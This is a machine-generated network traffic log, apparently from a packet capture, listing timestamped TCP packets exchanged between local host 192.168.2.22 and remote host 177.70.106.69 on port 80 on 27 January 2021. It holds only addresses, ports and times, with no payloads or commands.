                                                                                                                                                                                  Jan 27, 2021 06:51:28.065875053 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065876007 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065890074 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065912962 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065928936 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065948963 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065968037 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.065980911 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066001892 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066010952 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066026926 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066041946 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066057920 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066065073 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066091061 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066096067 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066108942 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066126108 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066145897 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066164017 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066184998 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066196918 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066229105 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066241980 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066252947 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066260099 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066282988 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066304922 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066324949 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066334009 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066344023 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066361904 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066365957 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066392899 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066396952 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066417933 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066427946 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066457987 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066459894 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066476107 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066482067 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066503048 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066512108 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066534042 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066550016 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066565037 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066585064 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066608906 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066622019 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066643000 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066654921 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066677094 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066685915 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066705942 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066709042 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066735983 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066737890 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066751957 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066767931 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066785097 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066817999 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066833019 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066849947 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066880941 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066884041 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066914082 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.066929102 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.068538904 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.069669008 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.310767889 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.310820103 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.310858011 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.310897112 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.310942888 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.310985088 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311021090 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311049938 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311074972 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311079979 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311094999 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311099052 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311114073 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311135054 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311153889 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311171055 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311193943 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311208963 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311233044 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311249971 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311279058 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311280966 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311326027 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311346054 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311363935 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311384916 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311403990 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311417103 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311443090 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311458111 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311482906 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311496973 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.311537981 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318387985 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318430901 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318480015 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318525076 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318548918 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318562984 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318572044 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318603992 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318619967 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318644047 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318661928 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318689108 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318711042 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318728924 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318748951 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318767071 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318794012 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318816900 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318818092 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318861961 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318877935 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318901062 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318919897 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318939924 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318964005 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318978071 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.318986893 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319015980 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319034100 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319055080 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319060087 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319093943 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319109917 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319140911 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319149971 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319184065 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319202900 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319222927 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319242954 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319262028 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319277048 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319299936 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319315910 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319335938 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319361925 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319375038 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319396019 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319413900 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319438934 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319462061 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319478035 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319505930 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319523096 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319545031 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319561958 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319585085 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319603920 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319623947 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319641113 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319663048 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319681883 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319704056 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319725990 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319744110 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319746017 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319793940 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319802046 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319837093 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319854021 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319875956 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319895029 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319916964 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319921970 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319955111 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319972038 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.319993019 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320013046 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320031881 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320035934 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320069075 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320091009 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320112944 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320117950 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320161104 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320175886 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320199966 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320218086 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320239067 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320255995 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320278883 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320297003 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320317030 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320318937 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320355892 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320372105 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320394039 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320411921 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320442915 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320451021 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320486069 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320512056 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320537090 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320554018 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320575953 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320595026 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320616007 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320626974 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320656061 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320676088 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320694923 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320713997 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320732117 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320735931 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320779085 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320785999 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320822954 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320836067 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320859909 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320880890 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320904970 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320911884 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320943117 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320960045 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.320981026 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321001053 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321019888 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321033001 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321058035 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321105003 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321105003 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321135044 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321149111 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321157932 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321188927 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321207047 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321228027 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321248055 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321265936 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321279049 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321304083 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321322918 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321341991 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321346998 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321378946 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321398973 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321439981 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321465969 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321515083 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321525097 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321557999 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321573019 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321597099 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321619987 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321635962 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321636915 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321674109 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321690083 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321712971 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321732044 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321749926 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321767092 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321789026 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321806908 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321835995 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321855068 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321882010 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321894884 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321926117 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321942091 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321964979 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.321983099 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322004080 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322025061 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322042942 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322067976 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322088957 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322109938 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322127104 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322144985 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322174072 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322185993 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322216988 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322230101 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322253942 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322273970 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322292089 CET8049166177.70.106.69192.168.2.22
